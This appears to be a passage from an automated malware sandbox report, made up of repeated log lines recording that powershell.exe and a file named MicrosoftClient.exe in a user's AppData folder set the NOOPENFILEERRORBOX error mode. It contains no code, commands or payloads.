Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
